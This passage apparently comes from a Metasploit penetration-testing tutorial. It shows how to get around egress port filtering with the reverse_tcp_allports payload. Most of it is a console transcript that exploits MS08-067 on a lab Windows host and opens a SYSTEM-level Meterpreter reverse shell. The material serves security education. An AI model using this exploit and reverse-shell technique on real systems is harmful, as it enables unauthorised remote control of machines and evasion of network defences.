In the preceding examples, we’ve relied on the reverse port always being open. But what if we’re attacking an organization with very strict egress port filtering? Most companies block outbound connections except those from a few defined ports, and it can be difficult to determine which ports can make outbound connections.
We can guess that port 443 won’t be inspected and will allow a TCP connection out, and that FTP, Telnet, SSH, and HTTP may be allowed. But why guess when Metasploit has a very specific payload for use in finding open ports?
Metasploit’s payload will try every available port until it finds an open one. (Going through the entire port range [1–65535] can take quite a long time, however.)
Let’s use this payload and have it try all ports connecting outbound until we get one that is successful:
msf >use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) >set LHOST 192.168.33.129lhost => 192.168.33.129 smsf exploit(ms08_067_netapi) >set RHOST 192.168.33.130rhost => 192.168.33.130 msf exploit(ms08_067_netapi) >set TARGET 3target => 3 msf exploit(ms08_067_netapi) >search ports[*] Searching loaded modules for pattern 'ports'... Compatible Payloads =================== Name Rank Description ---- ---- ----------- windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager. . . SNIP . . .msf exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp_allportspayload => windows/meterpreter/reverse_tcp_allports msf exploit(ms08_067_netapi) >exploit -j[*] Exploit running as background job. msf exploit(ms08_067_netapi) > [*] Started reverse handler on 192.168.33.129:1[*] Triggering the vulnerability... [*] Sending stage (748032 bytes) [*] Meterpreter session 1 opened (192.168.33.129:1 -> 192.168.33.130:1047)
msf exploit(ms08_067_netapi) >
sessions -l -vActive sessions =============== Id Type Information Connection Via -- ---- ----------- ---------- --- 1 meterpreter NT AUTHORITY\SYSTEM @ IHAZSECURITY 192. 168.33.129:1 -> 192.168.33.130:1047 exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >sessions -i 1[*] Starting interaction with 1... meterpreter >
Notice that we do not set an LPORT; instead, we use allports because we are going to try to connect out of the network on each port until we find an open one. If you look closely at you will see that our attacker machine is bound to :1 (all ports) and that it finds a port outbound on port 1047 on the target network.